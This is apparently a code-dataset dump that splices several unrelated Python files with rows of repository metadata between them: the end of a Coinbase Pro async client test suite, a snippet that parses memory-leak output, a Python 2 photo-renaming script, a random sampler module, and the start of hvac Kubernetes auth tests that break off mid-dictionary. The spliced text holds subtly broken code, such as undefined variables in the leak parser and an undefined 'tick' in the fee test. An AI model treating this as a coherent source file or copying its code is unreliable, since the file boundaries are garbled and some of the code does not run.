keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'product_id', 'settled', 'side', 'size',
'status', 'stop', 'stop_price', 'stp', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'sell')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
self.assertEqual(order['stop'], 'loss')
self.assertEqual(float(order['stop_price']), 2.5)
await asyncio.sleep(0.5)
# stop entry
order = await self.auth_client.market_order('buy', 'BTC-USD', .001,
stop='entry', stop_price=10000)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'funds', 'id', 'post_only', 'product_id', 'settled', 'side',
'size', 'status', 'stop', 'stop_price', 'stp', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'buy')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
self.assertEqual(order['stop'], 'entry')
self.assertEqual(float(order['stop_price']), 10000)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_cancel(self):
# Assumes limit_order and market_order work.
l_order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=1, size=1)
m_order = await self.auth_client.market_order('sell', 'BTC-USD', .001)
s_order = await self.auth_client.limit_order('sell', 'BTC-USD', 2, 5,
stop='loss', stop_price=10)
resp = await self.auth_client.cancel(l_order['id'])
self.assertEqual(len(resp), 1)
self.assertEqual(resp[0], l_order['id'])
with self.assertRaises(APIRequestError):
await self.auth_client.cancel(m_order['id'])
resp = await self.auth_client.cancel(s_order['id'])
self.assertEqual(len(resp), 1)
self.assertEqual(resp[0], s_order['id'])
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_cancel_all(self):
# Assumes market_order, limit_order, and orders work
await self.auth_client.cancel_all(stop=True)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 0)
await asyncio.sleep(0.5)
for price in (1, 2, 3):
order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=price, size=1)
await asyncio.sleep(0.5)
for price in (20000, 30000, 40000):
order = await self.auth_client.limit_order('sell', 'LTC-USD',
price=price, size=0.01)
await asyncio.sleep(0.5)
order = await self.auth_client.limit_order('buy', 'ETH-USD', 1, .01)
order = await self.auth_client.market_order('sell', 'LTC-USD', .02,
stop='loss', stop_price=1)
order = await self.auth_client.limit_order('buy', 'LTC-USD', 8000, .01,
stop='entry', stop_price=6500)
order = await self.auth_client.market_order('buy', 'ETH-USD', .03,
stop='entry', stop_price=2000)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 10)
resp = await self.auth_client.cancel_all('BTC-USD')
self.assertEqual(len(resp), 3)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 7)
resp = await self.auth_client.cancel_all()
self.assertEqual(len(resp), 4)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 3)
resp = await self.auth_client.cancel_all(product_id='LTC-USD', stop=True)
self.assertEqual(len(resp), 2)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 1)
resp = await self.auth_client.cancel_all(stop=True)
self.assertEqual(len(resp), 1)
await asyncio.sleep(.5)
orders, _, _ = await self.auth_client.orders(['open', 'active'])
self.assertEqual(orders, [])
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_orders(self):
# Assumes limit_order, market_order, and cancel_all work
await self.auth_client.cancel_all(stop=True)
orders, _, _, = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(orders), 0)
open_ids = []
for i in range(1, 4):
price = 1 + i /10
size = .001 * i
order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=price, size=size)
open_ids.append(order['id'])
open_orders, _, _ = await self.auth_client.orders('open')
self.assertEqual(len(open_orders), 3)
self.assertEqual(open_orders[0]['id'], open_ids[2])
self.assertEqual(open_orders[1]['id'], open_ids[1])
self.assertEqual(open_orders[2]['id'], open_ids[0])
active_ids = []
for i in range(1,4):
price = i + 1
stop_price = i
size = .01 * i
order = await self.auth_client.limit_order('sell', 'LTC-USD',
price=price, size=size,
stop='loss', stop_price=stop_price)
active_ids.append(order['id'])
active_orders, _, _ = await self.auth_client.orders('active')
self.assertEqual(len(active_orders), 3)
self.assertEqual(active_orders[0]['id'], active_ids[2])
self.assertEqual(active_orders[1]['id'], active_ids[1])
self.assertEqual(active_orders[2]['id'], active_ids[0])
market_ids = []
for i in range(1,4):
size = 0.001 * i
order = await self.auth_client.market_order('buy', 'BTC-USD',
size=0.01)
market_ids.append(order['id'])
await asyncio.sleep(0.25)
all_orders, _, _, = await self.auth_client.orders('all')
self.assertGreaterEqual(len(all_orders), 9)
self.assertEqual(all_orders[0]['id'], market_ids[2])
self.assertEqual(all_orders[1]['id'], market_ids[1])
self.assertEqual(all_orders[2]['id'], market_ids[0])
self.assertEqual(all_orders[3]['id'], active_ids[2])
oa_orders, _, _, = await self.auth_client.orders(['open', 'active'])
self.assertGreaterEqual(len(all_orders), 9)
self.assertEqual(oa_orders[0]['id'], active_ids[2])
self.assertEqual(oa_orders[1]['id'], active_ids[1])
self.assertEqual(oa_orders[2]['id'], active_ids[0])
self.assertEqual(oa_orders[3]['id'], open_ids[2])
self.assertEqual(oa_orders[4]['id'], open_ids[1])
self.assertEqual(oa_orders[5]['id'], open_ids[0])
oa_btc_orders, _, _ = await self.auth_client.orders(['open', 'active'],
'BTC-USD')
self.assertEqual(oa_btc_orders[0]['id'], open_ids[2])
self.assertEqual(oa_btc_orders[1]['id'], open_ids[1])
self.assertEqual(oa_btc_orders[2]['id'], open_ids[0])
orders, before, after = await self.auth_client.orders('all', limit=5)
self.assertEqual(len(orders), 5)
self.assertEqual(orders[0]['id'], market_ids[2])
self.assertEqual(orders[4]['id'], active_ids[1])
after_orders, after_before, after_after = await self.auth_client.orders(
'all', after=after)
self.assertEqual(after_orders[0]['id'], active_ids[0])
original_orders, _, _ = await self.auth_client.orders('all', before=after_before)
self.assertEqual(original_orders, orders)
await self.auth_client.cancel_all(stop=True)
await asyncio.sleep(.5)
oa_orders, _, _, = await self.auth_client.orders(['open', 'active'])
self.assertEqual(len(oa_orders), 0)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_get_order(self):
# Assumes limit_order and market_order work
ids = []
for i in range(1, 4):
price = 1 + i/10
size = .001 * i
order = await self.auth_client.limit_order('buy', 'BTC-USD',
price=price, size=size)
ids.append(order['id'])
for i in range(1, 4):
size = .001 * i
order = await self.auth_client.market_order('sell', 'BTC-USD',
size=size)
ids.append(order['id'])
oid = random.choice(ids)
order = await self.auth_client.get_order(oid)
self.assertEqual(order['id'], oid)
oid = random.choice(ids)
order = await self.auth_client.get_order(oid)
self.assertEqual(order['id'], oid)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_fills(self):
# Assumes market_order works
orders = []
for i in range(1, 5):
btc_size = .001 * i
ltc_size = .01 * i
side = random.choice(['buy', 'sell'])
order = await self.auth_client.market_order(side, 'BTC-USD', size=btc_size)
orders.append(order)
await asyncio.sleep(.25)
order = await self.auth_client.market_order(side, 'LTC-USD', size=ltc_size)
orders.append(order)
await asyncio.sleep(.25)
fills, _, _ = await self.auth_client.fills(product_id='BTC-USD')
keys = {'created_at', 'fee', 'liquidity', 'order_id', 'price',
'product_id', 'profile_id', 'settled', 'side', 'size',
'trade_id', 'usd_volume', 'user_id'}
self.assertGreaterEqual(len(fills), 4)
self.assertEqual(fills[0]['order_id'], orders[6]['id'])
fills, before, after = await self.auth_client.fills(product_id='LTC-USD', limit=3)
self.assertEqual(len(fills), 3)
self.assertEqual(fills[0]['order_id'], orders[7]['id'])
after_fills, after_before, after_after = await self.auth_client.fills(
product_id='LTC-USD', after=after)
self.assertLess(after_fills[0]['trade_id'], fills[-1]['trade_id'])
original_fills, _, _ = await self.auth_client.fills(product_id='LTC-USD',
before=after_before)
self.assertEqual(original_fills, fills)
order = random.choice(orders)
fills, _, _ = await self.auth_client.fills(order_id=order['id'])
self.assertGreaterEqual(len(fills), 1)
total = 0
for fill in fills:
total += float(fill['size'])
self.assertAlmostEqual(total, float(order['size']))
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_payment_methods(self):
keys = {'id', 'type', 'name', 'currency', 'primary_buy', 'primary_sell',
'allow_buy', 'allow_sell', 'allow_deposit', 'allow_withdraw',
'limits'}
methods = await self.auth_client.payment_methods()
self.assertIsInstance(methods, list)
self.assertIsInstance(methods[0], dict)
self.assertGreaterEqual(methods[0].keys(), keys)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_coinbase_accounts(self):
keys = {'id', 'name', 'balance', 'currency', 'type', 'primary', 'active'}
accounts = await self.auth_client.coinbase_accounts()
self.assertIsInstance(accounts, list)
self.assertIsInstance(accounts[0], dict)
self.assertGreaterEqual(accounts[0].keys(), keys)
@expectedFailure
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_PAYMENT_METHOD,
"Auth credentials, test USD account, and test USD payment method required.")
async def test_deposit_payment_method(self):
# As of 11/25/18 this call returns a 401 error:
# "refresh of oauth token failed"
resp = await self.auth_client.deposit_payment_method(1500, 'USD',
TEST_USD_PAYMENT_METHOD)
keys = {'amount', 'currency', 'id', 'payout_at'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(float(resp['amount']), 1500.0)
self.assertEqual(resp['currency'], 'USD')
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_COINBASE_ACCOUNT,
"Auth credentials, test USD account, and test usd Coinbase account required")
async def test_deposit_cointbase(self):
resp = await self.auth_client.deposit_coinbase(150, 'USD',
TEST_USD_COINBASE_ACCOUNT)
keys = {'amount', 'currency', 'id'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(resp['currency'], 'USD')
self.assertEqual(float(resp['amount']), 150.0)
@expectedFailure
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_PAYMENT_METHOD,
"Auth credentials, test USD account, and test USD payment method required.")
async def test_withdraw_payment_method(self):
# As of 11/25/18 this call returns a 401 error:
# "refresh of oauth token failed"
resp = await self.auth_client.withdraw_payment_method(1500, 'USD',
TEST_USD_PAYMENT_METHOD)
keys = {'amount', 'currency', 'id', 'payout_at'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(float(resp['amount']), 1500.0)
self.assertEqual(resp['currency'], 'USD')
@skipUnless(TEST_AUTH and TEST_USD_ACCOUNT and TEST_USD_COINBASE_ACCOUNT,
"Auth credentials, test USD account, and test usd Coinbase account required")
async def test_withdraw_cointbase(self):
resp = await self.auth_client.withdraw_coinbase(75, 'USD',
TEST_USD_COINBASE_ACCOUNT)
keys = {'amount', 'currency', 'id'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(resp['currency'], 'USD')
self.assertEqual(float(resp['amount']), 75.0)
@expectedFailure
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_withdraw_crypto(self):
# As of 11/25/18 this call returns a 401 error:
# "refresh of oauth token failed - The funds were transferred to
# Coinbase for processing, but failed to withdraw to
# 0x5ad5769cd04681FeD900BCE3DDc877B50E83d469. Please manually withdraw
# from Coinbase."
address = "0x5ad5769cd04681FeD900BCE3DDc877B50E83d469"
resp = await self.auth_client.withdraw_crypto(.001, 'LTC', address)
@expectedFailure
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_stablecoin_conversion(self):
# As of 11/25/18 this call returns a 400 error:
# "USDC is not enabled for your account"
resp = await self.auth_client.stablecoin_conversion('USD', 'USDC', 100)
keys = {'amount', 'id', 'from', 'from_account_id', 'to', 'to_account_id'}
self.assertIsInstance(resp, dict)
self.assertEqual(resp.keys(), keys)
self.assertEqual(float(resp['amount']), 100.0)
self.assertEqual(resp['from'], 'USD')
self.assertEqual(resp['to'], 'USDC')
@expectedFailure
@skipUnless(TEST_AUTH, "AUTH credentials required")
async def test_fees(self):
#As of 10/15/19, the Sandbox server returns a 500 error:
#"Internal server error"
keys = {'maker_fee_rate', 'taker_fee_rate', 'usd_volume'}
fees = await self.auth_client.fees()
self.assertIsInstance(tick, dict)
self.assertEqual(tick.keys(), keys)
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_reports(self):
# Combines tests for create_report and report_status
orders = []
for i in range(1, 4):
size = .001 * i
side = random.choice(['buy', 'sell'])
order = await self.auth_client.market_order(side, 'BTC-USD', size=size)
orders.append(order)
await asyncio.sleep(.25)
keys = {'id', 'type', 'status'}
end = datetime.utcnow()
start = end - timedelta(days=1)
end = end.isoformat()
start = start.isoformat()
resp1 = await self.auth_client.create_report('account', start, end,
account_id=TEST_BTC_ACCOUNT)
self.assertIsInstance(resp1, dict)
self.assertEqual(resp1.keys(), keys)
self.assertEqual(resp1['type'], 'account')
resp2 = await self.auth_client.create_report('fills', start, end,
product_id='BTC-USD')
self.assertIsInstance(resp2, dict)
self.assertEqual(resp2.keys(), keys)
self.assertEqual(resp2['type'], 'fills')
resp3 = await self.auth_client.create_report('fills', start, end,
product_id='BTC-USD', report_format='csv',
email='test@example.com')
self.assertIsInstance(resp3, dict)
self.assertEqual(resp3.keys(), keys)
self.assertEqual(resp3['type'], 'fills')
await asyncio.sleep(10)
status1 = await self.auth_client.report_status(resp1['id'])
keys = {'completed_at', 'created_at', 'expires_at', 'file_url', 'id',
'params', 'status', 'type', 'user_id'}
statuses = {'pending', 'creating', 'ready'}
self.assertIsInstance(status1, dict)
self.assertEqual(status1.keys(), keys)
self.assertEqual(status1['id'], resp1['id'])
self.assertEqual(status1['type'], 'account')
self.assertIn(status1['status'], statuses)
self.assertEqual(status1['params']['start_date'], start)
self.assertEqual(status1['params']['end_date'], end)
self.assertEqual(status1['params']['format'], 'pdf')
self.assertEqual(status1['params']['account_id'], TEST_BTC_ACCOUNT)
status2 = await self.auth_client.report_status(resp2['id'])
self.assertIsInstance(status2, dict)
self.assertEqual(status2.keys(), keys)
self.assertEqual(status2['id'], resp2['id'])
self.assertEqual(status2['type'], 'fills')
self.assertIn(status2['status'], statuses)
self.assertEqual(status2['params']['start_date'], start)
self.assertEqual(status2['params']['end_date'], end)
self.assertEqual(status2['params']['format'], 'pdf')
self.assertEqual(status2['params']['product_id'], 'BTC-USD')
status3 = await self.auth_client.report_status(resp3['id'])
self.assertIsInstance(status3, dict)
self.assertEqual(status3.keys(), keys)
self.assertEqual(status3['id'], resp3['id'])
self.assertEqual(status3['type'], 'fills')
self.assertIn(status3['status'], statuses)
self.assertEqual(status3['params']['start_date'], start)
self.assertEqual(status3['params']['end_date'], end)
self.assertEqual(status3['params']['email'], 'test@example.com')
self.assertEqual(status3['params']['format'], 'csv')
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_trailing_volume (self):
tv = await self.auth_client.trailing_volume()
keys ={'product_id', 'volume', 'exchange_volume', 'recorded_at'}
self.assertIsInstance(tv, list)
self.assertIsInstance(tv[0], dict)
self.assertEqual(tv[0].keys(), keys)
| 43.539346 | 121 | 0.555653 | 5,409 | 49,243 | 4.90941 | 0.078758 | 0.137262 | 0.055884 | 0.073696 | 0.681077 | 0.626699 | 0.582866 | 0.559066 | 0.499944 | 0.455922 | 0 | 0.021977 | 0.31438 | 49,243 | 1,130 | 122 | 43.577876 | 0.764558 | 0.045083 | 0 | 0.445946 | 0 | 0 | 0.12166 | 0.001916 | 0 | 0 | 0.000894 | 0 | 0.406634 | 1 | 0.002457 | false | 0.011057 | 0.015971 | 0 | 0.019656 | 0.001229 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
783e184c54f1db06b7ea583543c4cf885d8b04a4 | 1,315 | py | Python | web2py/applications/rip/modules/parseLogic.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | 1 | 2019-10-02T13:25:03.000Z | 2019-10-02T13:25:03.000Z | web2py/applications/rip/modules/parseLogic.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | null | null | null | web2py/applications/rip/modules/parseLogic.py | 2spmohanty/vcenter-automation | 1d10b765ef335087902b0194ed12a61e53807987 | [
"Apache-2.0"
] | 1 | 2021-11-05T09:51:02.000Z | 2021-11-05T09:51:02.000Z | import re
analysis_array = {'hvc': '151: 0x10b8 (4,280) ',
'applmgmt': '76: 0x7a0 (1,952) ', 'statsmonitor': '0: 0x0 (0) ', 'analytics': '643: 0x5cb8 (23,736) ',
'rhttpproxy': '0: 0x0 (0) ', 'vapi-endpoint': '912: 0x6d60 (28,000) ', 'vsm': '202: 0x1d90 (7,568) ',
'vmonapi': '71: 0x6a8 (1,704) ', 'vcha': '9: 0x138 (312) ', 'updatemgr': '1: 0x48 (72) ',
'vsan-health': '75: 0x708 (1,800) ', 'vmware-vpostgres': '68: 0x10c0 (4,288) ',
'eam': '376: 0x2fb0 (12,208) ', 'cis-license': '470: 0x2f50 (12,112) ', 'certificatemanagement': '131: 0xef8 (3,832) ',
'sca': '420: 0x3140 (12,608) ', 'pschealth': '0: 0x0 (0) ', 'perfcharts': '470: 0x3af0 (15,088) ',
'content-library': '957: 0x8778 (34,680) ', 'lookupsvc': '363: 0x27c8 (10,184) ',
'trustmanagement': '153: 0x1108 (4,360) ', 'vpxd-svcs': '880: 0x5690 (22,160) '}
output=str1.split('\n')
for service_analyzed in service_list:
# main_logger.debug("THREAD - %s - Result %s"%(service_analyzed,final_result_array[service_analyzed]))
analysis_array = str(final_result_array[service_analyzed]).split(':')
chunks_leaked = analysis_array[0]
mem_leaks = analysis_array[1]
final_output += '{:^25}{:^25}{:^30}'.format(service_analyzed, chunks_leaked, mem_leaks) + "\n" | 65.75 | 128 | 0.592395 | 171 | 1,315 | 4.438596 | 0.725146 | 0.098814 | 0.019763 | 0.060606 | 0.081686 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209738 | 0.187833 | 1,315 | 20 | 129 | 65.75 | 0.500936 | 0.076046 | 0 | 0 | 0 | 0 | 0.531381 | 0.017573 | 0 | 0 | 0.097071 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7846af745a3479a86fe8eba7b12a1d06be8e19d8 | 2,286 | py | Python | PhotoOrg.py | rdgao/PhotoOrg | f45218d17702f2ff93e43c857e27913a174fb8cf | [
"MIT"
] | 2 | 2017-06-02T02:00:47.000Z | 2020-09-05T19:04:10.000Z | PhotoOrg.py | rdgao/PhotoOrg | f45218d17702f2ff93e43c857e27913a174fb8cf | [
"MIT"
] | null | null | null | PhotoOrg.py | rdgao/PhotoOrg | f45218d17702f2ff93e43c857e27913a174fb8cf | [
"MIT"
] | null | null | null | #Richard Gao, 2014
#Library of code for image file manipulation
#and statistic gathering
from os import listdir, path, rename
from datetime import datetime
import PhotoOrg
def findFiles(dir):
#get a list of all pictures in the directory
dir = checkFolder(dir)
if dir is None: return
#search for target extensions
imgExt = ("jpg", "jpeg", "png", "bmp", "mov", "mp4")
allFiles = []
for file in listdir(dir):
#case invariance
if file.lower().endswith(imgExt):
allFiles.append(dir+file)
print len(allFiles), "files found."
#return a list of all target files
return allFiles
def getFileTime(f_name):
#return the modified time of the file f_name, both in epoch and in regular time
ts = path.getmtime(f_name)
tout = (ts, str(datetime.fromtimestamp(ts).strftime('%Y_%m_%d_%H_%M_%S')))
return tout
def renameAll(dir):
#rename all files in a directory based on their date
#check for invalid directory
dir = checkFolder(dir)
if dir is None: return
#search for all files in a folder
allFiles = findFiles(dir)
numRenamed = 0
for file in allFiles:
#find file extension
ext = path.splitext(file)[1].lower()
#get target name from photo date
nameDate = getFileTime(file)[1]
#rename with regular time
newName = dir+ nameDate + ext
if not file==newName:
#rename only if file name is not already proper name
ctr=0
while path.exists(newName):
#if path name already exists and is not itself, get version postfix
if newName==file:
break
else:
#in case of duplicate file names
ctr+=1
newName = dir+nameDate+"_V"+str(ctr)+ext
if not file==newName:
rename(file,newName)
numRenamed+=1
#report print statistics
print '%'*25,'\n',numRenamed,'/',len(allFiles), "files renamed in:\n",dir,'\n','%'*25
def getStats(dir):
#check for invalid directory
dir = checkFolder(dir)
if dir is None: return
#search for all files in a folder
allFiles = findFiles(dir)
stats=[]
for file in allFiles:
stats.append(getFileTime(file)[0])
print stats
def checkFolder(dir):
#fix directory if doesn't end with '/'
if not dir.endswith("/"):
dir = dir + '/'
#check for existence of directory
if path.exists(dir):
return dir
else:
print '%'*25+"\nGiven path does not exist: \n"+dir+'\n'+'%'*25
return | 26.894118 | 86 | 0.695976 | 349 | 2,286 | 4.532951 | 0.358166 | 0.035398 | 0.043616 | 0.049305 | 0.195954 | 0.195954 | 0.164349 | 0.164349 | 0.164349 | 0.164349 | 0 | 0.010805 | 0.190289 | 2,286 | 85 | 87 | 26.894118 | 0.843868 | 0.335521 | 0 | 0.259259 | 0 | 0 | 0.075434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7846bd187a642e3509aeeb9b0be6e8ea1276892b | 2,821 | py | Python | torchlib/utils/random/sampler.py | vermouth1992/torchlib | 63b2bedb40f670b2d9fbfc0daeab4a8d44623095 | [
"MIT"
] | 3 | 2019-07-23T21:32:36.000Z | 2022-02-04T23:13:30.000Z | torchlib/utils/random/sampler.py | Sayani21/mbrl-hvac | eb0e2213cc2734b1a8f83e485180cc622ffced5d | [
"MIT"
] | 1 | 2022-03-12T00:52:44.000Z | 2022-03-12T00:52:44.000Z | torchlib/utils/random/sampler.py | Sayani21/mbrl-hvac | eb0e2213cc2734b1a8f83e485180cc622ffced5d | [
"MIT"
] | 1 | 2019-07-23T21:32:23.000Z | 2019-07-23T21:32:23.000Z | """
A sampler defines a method to sample random data from certain distribution.
"""
from typing import List
import numpy as np
class BaseSampler(object):
def __init__(self):
pass
def sample(self, shape, *args):
raise NotImplementedError
class IntSampler(BaseSampler):
def __init__(self, low, high=None):
super(IntSampler, self).__init__()
if high is None:
self.low = 0
self.high = low
else:
self.low = low
self.high = high
def sample(self, shape, *args):
return np.random.randint(low=self.low, high=self.high, size=shape, dtype=np.int64)
class UniformSampler(BaseSampler):
def __init__(self, low, high):
super(UniformSampler, self).__init__()
self.low = np.array(low)
self.high = np.array(high)
assert self.low.shape == self.high.shape, 'The shape of low and high must be the same. Got low type {} and high type {}'.format(
self.low.shape, self.high.shape)
def sample(self, shape, *args):
return np.random.uniform(low=self.low, high=self.high, size=shape + self.low.shape).astype(np.float32)
class GaussianSampler(BaseSampler):
def __init__(self, mu=0.0, sigma=1.0):
super(GaussianSampler, self).__init__()
self.mu = mu
self.sigma = sigma
def sample(self, shape, *args):
return np.random.normal(self.mu, self.sigma, shape)
class GaussianMixtureSampler(BaseSampler):
""" Sample from GMM with prior probability distribution """
def __init__(self, mu: List, sigma: List, prob=None):
assert type(mu) == list and type(sigma) == list, 'mu and sigma must be list'
assert len(mu) == len(sigma), 'length of mu and sigma must be the same'
if type(prob) == list:
assert len(mu) == len(prob) and np.sum(prob) == 1., 'The sum of probability list should be 1.'
super(GaussianMixtureSampler, self).__init__()
self.mu = mu
self.sigma = sigma
self.prob = prob
def sample(self, shape, *args):
ind = np.random.choice(len(self.mu), p=self.prob)
return np.random.randn(*shape) * self.sigma[ind] + self.mu[ind]
class ConditionGaussianSampler(BaseSampler):
""" Conditional Gaussian sampler """
def __init__(self, mu: List, sigma: List):
assert type(mu) == list and type(sigma) == list, 'mu and sigma must be list'
assert len(mu) == len(sigma), 'length of mu and sigma must be the same'
super(ConditionGaussianSampler, self).__init__()
self.mu = np.expand_dims(np.array(mu), axis=1)
self.sigma = np.expand_dims(np.array(sigma), axis=1)
def sample(self, shape, *args):
ind = args[0]
return np.random.randn(*shape) * self.sigma[ind] + self.mu[ind]
| 32.802326 | 136 | 0.629918 | 387 | 2,821 | 4.472868 | 0.211886 | 0.046216 | 0.038128 | 0.062392 | 0.469093 | 0.424032 | 0.332756 | 0.302715 | 0.169844 | 0.169844 | 0 | 0.006567 | 0.24424 | 2,821 | 85 | 137 | 33.188235 | 0.805347 | 0.056009 | 0 | 0.280702 | 0 | 0 | 0.092319 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.210526 | false | 0.017544 | 0.035088 | 0.052632 | 0.438596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
78547897866cc63cf047c71a1fb0bc84a0a8f551 | 10,079 | py | Python | tests/unit_tests/v1/test_kubernetes_methods.py | ddeka2910/hvac | 80cf3950157bf003ee6622e6db84bb9d6c90e5f1 | [
"Apache-2.0"
] | 1 | 2020-12-14T04:01:10.000Z | 2020-12-14T04:01:10.000Z | tests/unit_tests/v1/test_kubernetes_methods.py | TerryHowe/hvac | a6b7f904bfaba3c1133ccc7fa5a0cff0d29340c7 | [
"Apache-2.0"
] | 2 | 2019-07-08T03:09:38.000Z | 2021-07-08T18:17:51.000Z | tests/unit_tests/v1/test_kubernetes_methods.py | TerryHowe/hvac | a6b7f904bfaba3c1133ccc7fa5a0cff0d29340c7 | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
import requests_mock
from parameterized import parameterized
from hvac import Client
class TestKubernetesMethods(TestCase):
"""Unit tests providing coverage for Kubernetes auth backend-related methods/routes."""
@parameterized.expand([
("default mount point", None, '127.0.0.1:80', ['test_key']),
("custom mount point", "k8s", 'some_k8s_host.com', ['test_key']),
])
@requests_mock.Mocker()
def test_create_kubernetes_configuration(self, test_label, mount_point, kubernetes_host, pem_keys, requests_mocker):
expected_status_code = 204
mock_url = 'http://localhost:8200/v1/auth/{0}/config'.format(
'kubernetes' if mount_point is None else mount_point,
)
requests_mocker.register_uri(
method='POST',
url=mock_url,
status_code=expected_status_code,
)
client = Client()
test_arguments = dict(
kubernetes_host=kubernetes_host,
pem_keys=pem_keys,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.create_kubernetes_configuration(**test_arguments)
self.assertEquals(
first=expected_status_code,
second=actual_response.status_code,
)
@parameterized.expand([
("default mount point", None),
("custom mount point", "k8s"),
])
@requests_mock.Mocker()
def test_get_kubernetes_configuration(self, test_label, mount_point, requests_mocker):
expected_status_code = 200
mock_response = {
'auth': None,
'data': {
'kubernetes_ca_cert': '',
'kubernetes_host': '127.0.0.1:80',
'pem_keys': ['some key'],
'token_reviewer_jwt': ''
},
'lease_duration': 0,
'lease_id': '',
'renewable': False,
'request_id': '12687b5f-b4f5-2ba4-aae2-2a8d7e53ca55',
'warnings': None,
'wrap_info': None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/config'.format(
'kubernetes' if mount_point is None else mount_point,
)
requests_mocker.register_uri(
method='GET',
url=mock_url,
status_code=expected_status_code,
json=mock_response,
)
client = Client()
test_arguments = dict()
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.get_kubernetes_configuration(**test_arguments)
self.assertEquals(
first=mock_response,
second=actual_response,
)
@parameterized.expand([
("default mount point", None, "application1", '*', 'some-namespace'),
("custom mount point", "k8s", "application2", 'some-service-account', '*'),
])
@requests_mock.Mocker()
def test_create_role(self, test_label, mount_point, role_name, bound_service_account_names, bound_service_account_namespaces, requests_mocker):
expected_status_code = 204
mock_url = 'http://localhost:8200/v1/auth/{0}/role/{1}'.format(
'kubernetes' if mount_point is None else mount_point,
role_name,
)
requests_mocker.register_uri(
method='POST',
url=mock_url,
status_code=expected_status_code,
)
client = Client()
test_arguments = dict(
name=role_name,
bound_service_account_names=bound_service_account_names,
bound_service_account_namespaces=bound_service_account_namespaces,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.create_kubernetes_role(**test_arguments)
self.assertEquals(
first=expected_status_code,
second=actual_response.status_code,
)
@parameterized.expand([
("default mount point", None, "application1"),
("custom mount point", "k8s", "application2"),
])
@requests_mock.Mocker()
def test_get_role(self, test_label, mount_point, role_name, requests_mocker):
expected_status_code = 200
mock_response = {
"auth": None,
"data": {
"bind_secret_id": True,
"bound_cidr_list": "",
"period": 0,
"policies": [
"default"
],
